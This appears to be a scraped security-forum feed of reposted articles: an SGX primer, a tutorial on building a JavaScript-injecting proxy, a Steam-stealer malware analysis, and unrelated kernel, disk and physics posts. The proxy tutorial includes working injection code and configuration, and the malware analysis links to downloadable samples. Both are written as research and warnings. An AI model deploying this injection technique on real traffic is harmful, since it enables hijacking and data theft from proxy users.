SGX as specified in [31] as a concrete basis for our VC3 implementation and to obtain realistic estimates for how SGX would impact the performance of VC3. Our software emulator does not attempt to provide security guarantees. The emulator is implemented as a Windows driver. It hooks the KiDebugRoutine function pointer in the Windows kernel that is invoked on every exception received by the kernel. Execution of an SGX opcode from [31] will generate an illegal instruction exception on existing processors, upon which the kernel will invoke our emulator via a call to KiDebugRoutine. The emulator contains handler functions for all SGX instructions used by VC3, including EENTER, EEXIT, EGETKEY, EREPORT, ECREATE, EADD, EEXTEND, and EINIT. We use the same mechanism to handle accesses to model specific registers (MSR) and control registers as specified in [31]. We also modified the SwapContext function in the Windows kernel to ensure that the full register context is loaded correctly during enclave execution. In Microsoft Haven research in October 2014 they said: We developed Haven on an instruction-accurate SGX emulator provided by Intel, but evaluate it using our own model of SGX performance. Haven goes beyond the original design intent of SGX, so while the hardware was mostly sufficient, it did have three fundamental limitations for which we proposed fixes (§5.4). These are incorporated in a revised version of the SGX specification, published concurrently by Intel. Note: The revised version they refer to is Rev 2 of the Intel® Software Guard Extensions Programming Reference. Aside from this there was a project at Georgia Institute of Technology to add Intel SGX Emulation using QEMU which they appear to have achieved between their plan presentation on October 20, 2014 and their summary presentation on December 1, 2014. However a quick search of the QEMU commits finds no reference to their commits. CPU Support Currently there is no CPU on the market which supports the SGX or SGX2 instruction set. Future Security Research So first off from reading the programming reference some initial questions would be: Do the 'SGX Enclave Control Structures' (SECS) have their integrity ensured? The SECSs contain meta-data used by the CPU to protect the enclave and will thus be a prime target. Do the 'Thread Control Structures' (TCS) have their integrity ensured? The TCSs contain meta-data used by the hardware to save and restore thread specific information when entering / exiting the enclave. Does the 'Enclave Page Cache Map' (EPCM) have its integrity ensured? The EPCM is used to keep track of which bits of memory are in the 'Enclave Page Cache' (EPC) and is 'managed by the processor'. The reason for the above questions are in part driven by the obvious but also by the fact that Intel mention that they stop certain concurrent operations to protect the integrity of these structures. Also it is important to differentiate between integrity provided by the Memory Encryption Engine (MEE – more on this later as it provides external memory modification protection) and that afforded by the microcode operating on them. In the presentation Dynamic Root of Trust and Trusted Execution we see that MEE does provide integrity protection from external modification: Some other questions which spring to mind also include: What are the algorithm and key generation mechanism for the 'Enclave Page Cache' (EPC)? The EPC is the RAM used by the secure enclaves. Where it is part of the RAM they are protected by an encryption engine. The whole debug problem. If you compromise or own the underlying OS before attestation of the enclave has occurred then there is likely the obvious bootstrap problem and where the Trusted Computing Base (TCB) is designed to help. This is also where remote attestation (as discussed by Joanna Rutkowska) will become critical to make sure that the aggressor has pre-owned the environment allowing them to catch the provisioning process within the supposed secure enclave. Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 177 Aside from the topics mentioned it is clear that the value of any microcode vulnerability or errata that allow subversion. For example the diagram below shows Processor Reserved Memory (PRM) which is used to house some of the structures mentioned in the question section. Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 40 How is integrity of the memory ensured in the EPC implementation? Looking at this related patent Parallelized counter tree walk for low overhead memory replay protection As the lower-level counters (including L2, LI and L0 counters and the version nodes 260) are off the processor die and therefore are susceptible to attacks, each counter and each version node are encoded with an embedded Message Authentication Code (MAC) (shown as the blocks with hatched lines) to ensure their integrity. In one embodiment, each embedded MAC is computed over the line in which they are embedded, using a corresponding counter from the next higher level as input. In the example of Figure 2, the embedded MAC for the version block 250 associated with L03 (shown in Figure 2 as the middle version block) is computed using the values of Vo - Vp and its corresponding L0 counter (LO3). The value of this embedded MAC is stored striped in the line of the version blocks 250 (shown as striped boxes in Figure 2). The embedded MAC for each line of L0, LI and L2 is computed similarly. L3 counters do not need embedded MACs because the contents of L3 counters are within the trusted boundary 205. Finally, from a defensive standpoint the impact on memory forensics and similar techniques is likely going to be substantial. Understanding the finer details will become critical. Conclusions Intel SGX is an interesting technology for numerous parties both good and bad outside of DRM. However, it is also clear that there is enough small print that the implementations across all families of CPU will warrant investigation when they become generally available. From a vulnerability/attack research perspective vulnerabilities in enclave protected code (including brokers) as well as CPU microcode will become incredibly valuable as will any attestation aspects. There will likely be renewed focus on understanding the exploitability of issues noted in Intel CPU Errata to potentially subvert or other influence control of an enclave. From a defensive standpoint cloud and sensitive compartmentalised client side operations become feasible without reliance on the security of underlying hypervisors or the performance / usability trade-offs of homomorphic encryption. Finally imagine a world where LSASS on Microsoft Windows runs in an SGX enclave so even certain attacks implemented by Mimikatz are no longer possible. Sursa: https://www.nccgroup.com/en/blog/2015/01/intel-software-guard-extensions-sgx-a-researchers-primer/#
  8. Why are free proxies free? because it's an easy way to infect thousands of users and collect their data Posted by Christian Haschek on 29.05.13 © Anonymous wallpaper I recently stumbled across a of Chema Alonso from the Defcon 20 Conference where he was talking about how he created a Javascript botnet from scratch and how he used it to find scammers and hackers. Everything is done via a stock SQUID proxy with small config changes. The idea is pretty simple: [server] Install Squid on a linux server [Payload] Modify the server so all transmitted javascript files will get one extra piece of code that does things like send all data entered in forms to your server [Cache] Set the caching time of the modified .js files as high as possible https This technique also works with https if the site loads unsafe resources (eg. jquery from a http site). Most browsers will tell you that, some might even block the content but usually nobody gives attention to the "lock" symbol. To put it simple Safe: Unsafe: In the presentation Chema said he posted the IP of the modified server on the web and after a few days there were over 5000 people using his proxy. Most people used it for bad things because everyone knows you're only anonymous in the web when you've got a proxy and it looks like many people don't think that the proxy could do something bad to them. I was wondering if it really is that simple so I took a VM running Debian and tried implementing the concept myself Make your own js infecting proxy I assume that you have a squid proxy running and also you'll need a webserver like Apache using /var/www as web root directory (which is the default) Step 1: Create a payload For the payload I'll use a simple script that takes all links of a webpage and rewrites the href (link) attribute to my site. /etc/squid/payload.js for(var i=0;i<document.getElementsByTagName('a').length;i++) document.getElementsByTagName('a')[i].href = "https://blog.haschek.at"; [B] Step 2: Write the script that poisons all requested .js files /etc/squid/poison.pl #!/usr/bin/perl $|=1; $count = 0; $pid = $$; while(<>) { chomp $_; if($_ =- /(.*\.js)/i) { $url = $1; system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url"); system("chmod o+r /var/www/tmp/$pid-$count.js"); system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js"); print "http://127.0.0.1:80/tmp/$pid-$count.js\n"; } else { print "$_\n"; } $count++; } This script uses wget to retrieve the original javascript file of the page the client asked for and adds the code from the /etc/squid/payload.js file to it. This modified file (which contains our payload now) will be sent to the client. You'll also have to create the folder /var/www/tmp and allow squid to write files in it. This folder is where all modified js scripts will be stored. Step 3: Tell Squid to use the script above in /etc/squid/squid.conf add url_rewrite_program /etc/squid/poison.pl Step 4: Never let the cache expire /var/www/tmp/.htaccess ExpiresActive On ExpiresDefault "access plus 3000 days" These lines tell the apache server to give it an insanely long expiration(caching) time so it will be in the browser of the user until they're cleaning their cookies/caches One more restart of squid and you're good to go. If you're connecting to the proxy and try to surf on any webpage, the page will be displayed as expected but all links will lead to this blog. The sneaky thing about this technique is that even when somebody disconnects from the proxy the cached js files will most likely be still in their caches. In my example the payload does nothing too destructive and the user will know pretty fast that something is fishy but with creative payloads all sorts of things could be implemented. Tell your friends never to use free proxies because many hosts do things like that. Be safe on the web (but not with free proxies) Sursa: https://blog.haschek.at/post/fd9bc
  9. Video archives of security conferences Just some links for your enjoyment List of security conferences in 2014 Video archives: Blackhat 2012 Botconf 2013 Bsides Bsides Cleveland 2012 BsidesCLE Chaos Communication Congress Chaos Communications Channel YouTube 31c3 Recordings Defcon Defcon: All Conference CDs and DVDs with Presentation PDF files (updated 2014 for DEF CON 22): Torrent Defcon: all other Derbycon Digital Bond's S4x14 Digital Bond's S4x14 ISC Security Circle City Con GrrCON Information Security Summit & Hacker Conference Hack in the box HITB 2011 InfowarCon InfowarCon 2014 Free and Open Source Software Conference 2014 froscon2014 International Cyber Security Conference KIACS Cyber Security Conference KIACS 2014 Louisville NATO Cyber Security Conference Notacon Notacon 2013 Nullcon Nullcon 2014 Nullcon 2013 Nullcon 2012 OWASP AppSec EU Research 2013 AppSecUSA 2012 AppSecUSA 2011 RSA Videos Ruxcon Shmoocon Shmoocon 2014 Troopers OISF OHM OHM2013. Observe, Hack, Make Special thanks to Adrian Crenshaw for his collection of videos Posted by Mila Sursa: contagio: Video archives of security conferences
  10. Hard disk hacking - Intro Intro Apart from this article, I also gave a talk at OHM2013 about this subject. The video of that talk (minus the first few minutes) is now online. Hard disks: if you read this, it's pretty much certain you use one or more of the things. They're pretty simple: they basically present a bunch of 512-byte sectors, numbered by an increasing address, also known as the LBA or Logical Block Address. The PC the HD is connected to can read or write data to and from these sectors. Usually, a file system is used that abstracts all those sectors to files and folders. If you look at an HD from that naive standpoint, you would think the hardware should be pretty simple: all you need is something that connects to a SATA-port which can then position the read/write-head and read or write data from or to the platters. But maybe more is involved: don't hard disks also handle bad block management and SMART attributes, and don't they usually have some cache they must somehow manage? All that implies there's some intelligence in an hard disk, and intelligence usually implies hackability. I'm always interested in hackability, so I decided I wanted to look into how hard disks work on the non-mechanical level. Research like this has been done before for various bits of hardware: from PCI extension cards to embedded controllers in laptops to even Apple keyboards. Usually the research has been done in order to prove the hackability of these devices can lead to compromised software, so I decided to take the same approach: for this hack, I wanted to make a hard disk that could bypass software security. Articol complet: Sprites mods - Hard disk hacking - Intro
  11. [h=1]RootFW 4[/h] An Android Root Shell Framework RootFW is a tool that helps Android Applications act as root. The only way for an application to perform tasks as root, is by executing shell commands as Android has no native way of doing this. However, due to different types of shell support on different devices/ROM's (Shell type, busybox/toolbox versions etc.), this is not an easy task. RootFW comes with a lot of pre-built methods to handle the most common tasks. Each method tries to support as many different environments as possible by implementing different approaches for each environment. This makes the work of app developers a lot easier. Checkout the Wiki page for further info Sursa: https://github.com/SpazeDog/rootfw
  12. Kernel booting process. Part 1. If you have read my previous blog posts, you can see that some time ago I started to get involved with low-level programming. I wrote some posts about x86_64 assembly programming for Linux. At the same time, I started to dive into the Linux source code. It is very interesting for me to understand how low-level things work, how programs run on my computer, how they are located in memory, how the kernel manages processes and memory, how the network stack works on low-level and many many other things. I decided to write yet another series of posts about the Linux kernel for x86_64. Note that I'm not a professional kernel hacker, and I don't write code for the kernel at work. It's just a hobby. I just like low-level stuff, and it is interesting for me to see how these things work. So if you notice anything confusing, or if you have any questions/remarks, ping me on twitter 0xAX, drop me an email or just create an issue. I appreciate it. All posts will also be accessible atlinux-internals and if you find something wrong with my English or post content, feel free to send pull request. Note that it isn't official documentation, just learning and knowledge sharing. Required knowledge Understanding C code Understanding assembly code (AT&T syntax) Anyway, if you just started to learn some tools, I will try to explain some parts during this and following posts. Ok, little introduction finished and now we can start to dive into kernel and low-level stuff. All code is actual for kernel - 3.18, if there will be changes, I will update posts. Magic power button, what's next? Despite that this is a series of posts about linux kernel, we will not start from kernel code (at least in this paragraph). Ok, you pressed magic power button on your laptop or desktop computer and it started to work. After the mother board sends a signal to the power supply, the power supply provides the computer with the proper amount of electricity. Once motherboard receives the power good signal, it tries to run the CPU. The CPU resets all leftover data in its registers and sets up predefined values for every register. 80386 and later CPUs defines the following predefined data in CPU registers after the computer resets: IP 0xfff0 CS selector 0xf000 CS base 0xffff0000 The processor works in real mode now and we need to make a little retreat for understanding memory segmentation in this mode. Real mode is supported in all x86 compatible processors, from 8086 to modern Intel 64bit CPUs. The 8086 processor had a 20 bit address bus, which means that it could work with 0-2^20 bytes address space (1 megabyte). But it only had 16 bit registers, and with 16 bit registers the maximum address is 2^16 or 0xffff (640 kilobytes). Memory segmentation was used to make use of all of the address space. All memory was divided into small, fixed-size segments of 65535 bytes, or 64 KB. Articol complet: https://github.com/0xAX/linux-insides/blob/master/linux-bootstrap-1.md
  13. Helmhurts A few posts back I was concerned with optimising the WiFi reception in my flat, and I chose a simple method for calculating the distribution of electromagnetic intensity. I casually mentioned that I really should be doing things more rigorously by solving the Helmholtz equation, but then didn’t. Well, spurred on by a shocking amount of spare time, I’ve given it a go here. UPDATE: Android app now available, see this post for details. The Helmholtz equation is used in the modelling of the propagation of electromagnetic waves. More precisely, if the time-dependence of an electromagnetic wave can be assumed to be of the form and the dispersion relation given by for some refractive index distribution , then the electric field solves where is some source function. Given a source of radiation and a geometry to propagate in, in principle the Helmholtz equation can be solved for the entire radiation field . In practice this may not be so simple. Here I chose to model a situation in 2D, and set up a computational grid of size with grid cells labelled for , . Given this discretisation, the equation above becomes This is a linear equation in the ‘current’ cell as a function of its 4 neighbours. Each cell has an equation describing the relationship with its neighbours, so there are equations in unknowns. This motivates a linear algebraic approach to the problem – if all equations can be represented as one giant matrix equation, that matrix can be inverted and an exact solution for recovered. In particular we’ll have for some matrix , and we can compute . This is slightly tricky due to the fact that a 2D labelling system needs to be converted to a 1D labelling system , as the 2D simulation domain needs to be converted to a 1D vector. I use the translation that so that A pair of cells and are then separated by in this new labelling system, and a pair of cells and separated by 1. The row in the matrix equation corresponding to the th cell looks like where there are blank cells between the and cells. In fact, it is clear that the vast majority of the matrix is zero, which can help when considering the sheer size of the matrix. For this problem a room is approximately 5 m across, and the wavelength to resolve is around 5 cm. We will require 500" title="N > 500" class="latex"> or so then, which means the number of elements is around ! Storing each as a single precision number would require around 60 GB of RAM, and my poor battered laptop wouldn’t have a chance inverting that matrix even if it would fit in memory. Fortunately this problem has crept up on people cleverer than I, and they invented the concept of the sparse matrix, or a matrix filled mostly with zeros. We can visualise the structure of our matrix using the handy Matlab function spy – as plotted below it shows which elements of the matrix are nonzero. Here , so there are 784 elements in the matrix. However only 64 of those are nonzero, just 8% of the matrix is actually useful in computation! This drops to 4% if the resolution of our grid jumps by a factor of 10, and stays around 5% for another factor of 10. There is a special data structure in Matlab for sparse matricies, and using it speeds up calculation of inverses by orders of magnitude. In this case the code is literally a hundred times faster and uses a fraction of the memory. Moving on to the physics then, what does a solution of the Helmholtz equation look like? On the unit square for large , the quickest way is actually to use a packet of rice – see e.g. .In this calculation I’ve set boundary conditions that on the edges of the square, and set . It turns out that the Helmholtz equation can also be applied to the modelling of the forced vibrations of the square plate, where the choice of conditions above equates to applying a force at the centre of the plate and clamping the edges. The rice/sand/etc settles at the nodes of the plate, i.e. the positions which stay stationary in the oscillation. Visualised below are a selected few pretty pictures where I’ve taken a logarithmic colour scale to highlight the positions of zero electric field – the ‘nodes’. As the animation proceeds starts high and gradually gets lower, corresponding to fast plate oscillations gradually getting slower. Once again physics has turned out unexpectedly pretty and distracted me away from my goal, and this post becomes a microcosm of the entire concept of the blog… Moving onwards, I’ll recap the layout of the flat where I’m hoping to improve the signal reaching my computer from my WiFi router: I can use this image to act as a refractive index map – walls are very high refractive index, and empty space has a refractive index of 1. I then set up the WiFi antenna as a small radiation source hidden away somewhat uselessly in the corner. Starting with a radiation wavelength of 10 cm, I end up with an electromagnetic intensity map which looks like this: This is, well, surprisingly great to look at, but is very much unexpected. I would have expected to see some region of ‘brightness’ around the electromagnetic source, fading away into the distance perhaps with some funky diffraction effects going on. Instead we get a wispy structure with filaments of strong field strength snaking their way around. There are noticeable black spots too, recognisable to anyone who’s shifted position in a chair and having their phone conversation dropped. What if we stuck the router in the kitchen? This seems to help the reception in all of the flat except the bedrooms, though we would have to deal with lightning striking the cupboard under the stairs it seems. What about smack bang in the middle of the flat? Thats more like it! Tendrils of internet goodness can get everywhere, even into the bathroom where no one at all occasionally reads BBC News with numb legs. Unfortunately this is probably not a viable option. Actually the distribution of field strength seems extremely sensitive to every parameter, be it the position of the router, the wavelength of the radiation, or the refractive index of the front door. This probably requires some averaging over parameters or grid convergence scan, but given it takes this laptop 10 minutes or so to conjure up each of the above images, that’s probably out of the question for now. UPDATE As suggested by a helpful commenter, I tried adding in an imaginary component of the refractive index for the walls, taken from here. This allows for some absorption in the concrete, and stops the perfect reflections forming a standing wave which almost perfectly cancels everything out. The results look like something I would actually expect: END UPDATE It’s quite surprising that the final results should be so sensitive, but given we’re performing a matrix inversion in the solution, the field strength at every position depends on the field strength at every other position. This might seem to be invoking some sort of non-local interaction of the electromagnetic field, but actually its just due to the way we’ve decided to solve the problem. The Helmholtz equation implicitly assumes a solution independent of time, other than a sinusoidal oscillation. What we end up with is then a system at equilibrium, oscillating back and forth as a trapped standing wave. In effect the antenna has been switched on for an infinite amount of time and all possible reflections, refractions, transmissions etc. have been allowed to happen. There is certainly enough time for all parts of the flat to affect every other part of the flat then, and ‘non-locality’ isn’t an issue. In a practical sense, after a second the electromagnetic waves have had time to zip around the place billions of times and so equilibrium happens extremely quickly. Now it’s all very well and good to chat about this so glibly, because we’re all physicists and 90% of the time we’re rationalising away difficult-to-do things as ‘obvious’ or ‘trivial’ to avoid doing any work. Unfortunately for me the point of this blog is to do lots of work in my spare time while avoiding doing anything actually useful, so lets see if we can’t have a go at the time-dependent problem. Once we start reintroducing ‘s into the Helmholtz equation it’s actually not an approximation at all any more and we’re back to solving the full set of Maxwell’s equations. This is exactly what the FDTD technique achieves – Finite Difference Time Domain. The FD means we’re solving equations on a grid, and the TD just makes it all a bit harder. To be specific there is a simple algorithm to march Maxwell’s equations forwards in time, namely I’ve introduced a current source and the relative permittivity/permeability and such that . We can use all of the machinery mentioned above to discretise the flat layout into a grid, but this time repeatedly apply the above equations. All 6 variables are stored on the grid and updated for every time step. The RAM requirements aren’t so strict in this case which would allow me to model the full flat down to millimetre resolution, but this is just too slow. A full simulation might take all day, and even I can’t justify that. Running one at a longer wavelength 30cm allows me to drop the resolution enough to run a quick simulation before I go to bed. With the router in approximately the correct place, you can see the radiation initially stream out of the router. There are a few reflections at first, but once the flat has been filled with field it becomes static quite quickly, and settles into an oscillating standing wave. This looks very much like the ‘infinite time’ Helmholtz solution above, albeit at a longer wavelength, and justifies some of the hand-waving ‘intuition’ I tried to fool you with. Sursa: Helmhurts | Almost looks like work
  14. Analysis of Steam stealers and the ‘Steam Stealer Extreme’ service Back in the end of November I started to spot some steam stealing malware in a backdoored Mumble installer: Samples of these kind of stealers appeared more and more often. Around half of December I ended up with 14 unique samples that were actively spread around (see the end of this post for hashes and downloads for these samples): All of them except one are around 250kb or more in size. Only one sample, called ‘SteamDouble.exe’, was 69kb in size: File name: SteamDouble.exe File size: 69.0 KB ( 70656 bytes ) First seen: 2014-12-07 MD5: 5f50e810668942e8d694faeabab08260 SHA1: b44c087039ea90569291bfe1105693417fb2f84d SHA256: 21c93477c200563fea732253f0eb2814b17b324e5d533a7c347b1bd7c6267987 ssdeep: 1536:NrNoD6y4E/+JWiiVUIekBixa7vq5KwSTPxkjL/Gv:NrNADqWii2IekBMa7v9wSYY VirusTotal: https://www.virustotal.com/en/file/21c93477c200563fea732253f0eb2814b17b324e5d533a7c347b1bd7c6267987/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/NDQwMzE3ZTI4OTc5NGZkYmI4MDc4YzhhNDMwOGFmNjA/ STEAMDOUBLE/BRUTALITY analysis The ‘SteamDouble.exe’ sample came from a link originally send in a Steam chat message. The text of the message was: “”lol, wtf? http://img-pic[.]com/image612_14[.]jpeg”. When visiting this link the server on the other end responded with: HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 04 Jan 2015 14:15:03 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Location: http://goo[.]gl/QaidJm This was a redirect towards a Google shortlink: “goo[.]gl/QaidJm”. In turn this shortlink redirects towards ‘steamdouble[.]com’ website: It advertises the so called ‘CS:GO Skin Duplicator’. The files for this tool are hosted on a filesharing service from russia called ‘exfile.ru’. The website itself also features a video showing the usage of the tool: The video shows a tool which allows, as the tool’s name says, a user to duplicate CS:GO items. In the video it links to ‘csgoskinduplication[.]com’ this is the exact same website as ‘steamdouble[.]com’. The sample I grabbed back when I first saw this appear was not obfuscated or crypted. The current version available from the site has a crypted fake DLL which is decrypted and then ran. This payload is the same one I will be showing in the further analysis, just packed/crypted. It seems when the guy behind this first started he didn’t seem to care about packing/crypting his payload. The ‘SteamDouble.exe’ payload is written in C#. Throwing it in a tool like ILSpy gives us a nice set of source code files especially because the author didn’t obfuscate any of the code. Just by looking at the project title ‘Stealer’ and the folder names inside the project like ‘SteamStealer’ it gives us a clear indication of what this sample does: The first folder named ‘Steam4NET’ contains a modified, stripped or old version of the Steam4NET open source .NET wrapper around the Steamworks C++ interfaces hosted on Github: https://github.com/SteamRE/Steam4NET Looking at the main function we see the first thing it does is download an image which is stored in the appdata folder and shown to the user: The image that is downloaded and displayed shows a screenshot of a russian DOTA2 account with the items it has available. (The original message send on Steam chat was an ‘image’ link so this makes sense to hide its real purpose). The downloaded image: The second part of the main function is where the actual ‘Steam stealing’ takes place: First it creators a new SteamWorker and adds an ‘offer’ which is used to trade items. The Steam cookies are parsed and as long as there are Steam cookies (aka the user is logged in to Steam) it will perform the ‘Spam.SpamInFriendList’ function which contains the message which got me on the sample in the first place “lol, wtf? http://img-pic[.]com/image612_14[.]jpeg”. After this it adds the items it wants to steal which is a long list of items this guy is interested in. The last step is where it actually sends the item to trade to his own account. On the other end the guy only has to accept the trade offers (or have some automated way of doing it) and the items will belong to him. Very simple but an effective way of stealing items. Going back to the original ‘addOffer’ function if we look at the arguments it expects we can find who is behind this (or at least the account used for the malicious trading): The first argument to this function is the user’s Steam ID. This can be put in a SteamCommunity URL to go the user’s profile. The URL for this is: ‘http://steamcommunity.com/profiles/<SteamID>/’, this will redirect to the user’s real ID. In this case the SteamID used is ‘76561198161815322’, if we put this is in we get redirected to ‘Steam Community :: prewelec. This is the profile of a guy going by the nickname ‘prewelec’ who is supposedly from the US: On the bottom the user commented some trade URL’s with the ID and token, these are the same items used for the ‘addOffer’ function’s 2nd and 3rd argument. Looking at this user’s inventory it doesn’t show a very big amount of items but it could be this is just a middle-man account used to trade the items further: Another interesting thing from this profile is the comments it leaves on some other gamer’s profile: The comment is pretty much the same message it spams around via the Steam chat ‘Spam.SpamInFriendList’ function. This sample stood out and appears to be a custom thing created by a criminal specifically for his needs. The other samples however did not match this sample, not only by size. The Steam Stealer Extreme service From the 14 samples I obtained the ‘SteamDouble’ sample stood out of the bunch due to the size. The other 13 are all around 250kb in size. Throwing any of the 250kb and bigger samples into ILSpy gives us the same decompilation structure: This tells me its the same tool/stealer used in all of these samples. Looking at the function inside the decompiled code we see similar functionality as with the ‘SteamDouble’ Stealer: It can gather the Steam cookie, add items to be stolen, post comments (on profile pages) to spread and also has two functions indicating of a spreading mechanism towards friends (be it Steam chat or profile comments): ‘SpreadToFriends’ and ‘SpreadToFriendsUsingChat’. Just by looking at these functions we get a clear picture of what the purpose is of this malware. The builder used for these samples does obfuscate some of the code which causes some trouble for the decompiler. Of course it can be fixed but seeing as the purpose of this thing is already clear I’m not going to waste time on cleaning all the samples. The more interesting question here is what is ‘Steam Stealer Extreme’. By simply googling for it you can find the ‘sales’ website located at steamstealer[.]com, steamstealer[.]org and steamstealer[.]net. It has the title ‘Steam Stealer Extreme’ which is marketed as ‘Revolutionizing the Steam Item Stealing Industry’, erhm… yes. An about section details some more information on ‘the product’: Steam Stealer Extreme is the new Steam Stealer completely custom coded (you can PM us and get some proof if you want!) and functions well. Steam Stealer Extreme is not like other steam stealers which is based off the same code as found on the Russian forum where it was leaked. It has extra features like filters (which are properly coded) and spreading your file via commenting on the client’s friends’ profiles * NEW * Spreads Via Chat! We’re a no bullshit product with little disadvantages. Our stealer does work and will work until Steam decide to patch the methods used. Steam Stealer Extreme is about getting the items you want and when you want. They also have some video’s showing how it works on their YouTube channel: https://www.youtube.com/channel/UC7MjY8duE1xh-tTWpAsj_o The site also contains an image of the ‘builder’ for the stealer: A list of features for the stealer: Information on how to purchase ‘Steam Stealer Extreme’, which is currently only available via Bitcoin payment: And at the bottom there’s also some contact information: Looking at the registration date of the website the .com, .org and .net websites for ‘Steam Stealer Extreme’ were registered on 2014-11-16 and all hosted on a VPS owned by OVH France at 92.222.189.92. The email address ‘brynaldo8’ in the contact section from the site is ‘brynaldo8@gmail.com’. Interestingly if you simply google for this email address you will find the following pastebin post which contains a database dump with the (hashed) password for ‘LaPanthere’ which is the name this guy goes by: (Originally located at: LaPanthere SQL - Pastebin.com) The ‘LaPanthere’ guy also has a PasteBin account at LaPanthere's Pastebin - Pastebin.com: Combining ‘LaPanthere’ and ‘brynaldo8’ also shows a dump from a post by Brian Krebs about ‘ragebooter’ being hacked. The dump also contains the user details of ‘LaPanthere’ but with a hotmail.com email address instead of gmail.com: (Original dump located at: http://krebsonsecurity.com/wp-content/uploads/2013/08/ragebooter.txt) Finding this guy’s Steam profile is also easy, it actually matches the avatar from the PasteBin account. (Steam profile: Steam Community :: LaPanthere): This show’s ‘LaPanthere’ is an Australian guy. I won’t go any further into this person’s identity as I’m not here to make personal allegations against someone. All I am going to say about it is that this person is rather sloppy with what he’s leaving behind as a trail. Finding out ‘LaPanthere”s real identity is not that hard and only a few steps away from what I’ve shown. I would expect a bit more from someone running a service like this, but keeping in mind his public profile(s) are on hackforums and leakforums it says enough . As for the ‘Steam Stealer Extreme’ malware going around, just don’t start running everything being send to you via chat messages or comments. Would you have your items stolen send a message to the Valve support staff explaining your situation, they will be able to help you out. Detection wise, Antivirus products are still somewhat behind on detecting this one properly but its getting there (slowly). All the samples I’ve shown are available for download from Malwr, see the next section for details and links to all the files, enjoy! Steam Stealer Extreme samples: Note: These are not all the Steam Stealer Extreme samples out there. These are just the ones I found when focusing on find out what they were and where it came from back in November through December 2014. File name: Cracked SSE Builder.exe File size: 363.5 KB ( 372224 bytes ) First seen: 2014-11-25 MD5: 38569912bdd5e0f9d13d5e8b2c00800c SHA1: f153bf9d850f396e30f507d526a7a365ef93bdfd SHA256: 700c38b312e1404b5d488767e1f45171848af00d4232cf9c2338e76e7648eb59 ssdeep: 6144:ODrM4scvXCPGrLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxd:ODr/sGXoT/dEWP3GxtJw4Mp VirusTotal: https://www.virustotal.com/en/file/700c38b312e1404b5d488767e1f45171848af00d4232cf9c2338e76e7648eb59/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MWNkYWQwYmRjZGQ3NGUyNWJmZDY5ODA2YTgwOTQ3Nzc/ File name: CSGO Hack v1 - Coded by Empathy.exe File size: 355.0 KB ( 363520 bytes ) First seen: 2014-12-03 MD5: 99fd0d39b96009cd17a343d36e3f6c75 SHA1: 107090152ec18240064b035181a7a5220b7152d0 SHA256: 7b660ed6ecbe98591802d6547f75f133434e92f45fa4bd5b4b4053f2975ba050 ssdeep: 6144:45oNxrSsfjLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxIkEFMa:4+NbC/dEWP3GxtJw4MfE VirusTotal: https://www.virustotal.com/en/file/7b660ed6ecbe98591802d6547f75f133434e92f45fa4bd5b4b4053f2975ba050/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/YmEzYzBkOWNmYWIyNGEwZjgyOGYyMTdhMDljNGFjOGQ/ File name: CSGO Multi-Hack by LionHacks.exe File size: 499.0 KB ( 510976 bytes ) First seen: 2014-11-26 MD5: b1b8915930cd72ef8fac0b449b13f966 SHA1: 040461f0a9b1be066158caa50a21ae9d58a07e89 SHA256: 3508518052ff500ac1d4e4e72dea79844b38660178f45c41ecfe47fc9abcc339 ssdeep: 6144:0ZQel9dgZgdLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxgL6ceixULxr9TBvctzF6WI:0ZQcdI1/dEWP3GxtJw4MApxuzkt0yij VirusTotal: https://www.virustotal.com/en/file/3508518052ff500ac1d4e4e72dea79844b38660178f45c41ecfe47fc9abcc339/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/ZWM1NTcxYWYwOWIwNDhlZGEwNTdjNWQzMWJlNTA4NDI/ File name: CsgoSound.exe File size: 282.2 KB ( 289002 bytes ) First seen: 2014-12-03 MD5: 4928ed30b0f9eee8078baa74dd0d7729 SHA1: 9b2689a6236d172499aa6019bf99c74dccb169e0 SHA256: 642a51ef3844cfe8389bf41b288ed42ce1c10998de142c5a4529929ed3d35e2c ssdeep: 6144:L0fzV71SinbLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxwIkI:gzjS/dEWP3GxtJw4MEq VirusTotal: https://www.virustotal.com/en/file/642a51ef3844cfe8389bf41b288ed42ce1c10998de142c5a4529929ed3d35e2c/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/NjFkY2Q2OGM4OTBiNDNlNjhjMmMzYTY3Nzg0NmM5MDI/ File name: Easy Trader.exe File size: 445.0 KB ( 455680 bytes ) First seen: 2014-11-20 MD5: 4e29168df760a5577e61d0b6e9e05704 SHA1: 8f323230d114800d6aadc3dfa1abf045030ddc43 SHA256: b81fe9ec92388484fa5a8542aaa5f9206e50871f664158a3734d891b1e325147 ssdeep: 6144:uwAArfLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx8mMbxuszfkOffcXF+cOr+9lPF:g/dEWP3GxtJw4MNMbxjdffgj VirusTotal: https://www.virustotal.com/en/file/b81fe9ec92388484fa5a8542aaa5f9206e50871f664158a3734d891b1e325147/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MjM4NWNmMWI2YTg3NDdiMTgxYjcwYWJiOTc0MGUxYWU/ File name: ESAntiCheat.exe File size: 257.5 KB ( 263680 bytes ) First seen: 2014-11-25 MD5: 65a3f03dc222ae27cb38cf5ef737f92d SHA1: ebc1c3e230afa07b40a49b037a3e349907e04fa0 SHA256: f3abc0a2eaf9128833722e6db6c7e34b7228345a983991ba165f5eecb59d5141 ssdeep: 6144:RTfzI+RCaduLCrLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx:RTblEB3/dEWP3GxtJw4M VirusTotal: https://www.virustotal.com/en/file/f3abc0a2eaf9128833722e6db6c7e34b7228345a983991ba165f5eecb59d5141/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MzBiMDJlYmEwNTkwNDE0MDliMjdmNTdhMDcyZTRjOGE/ 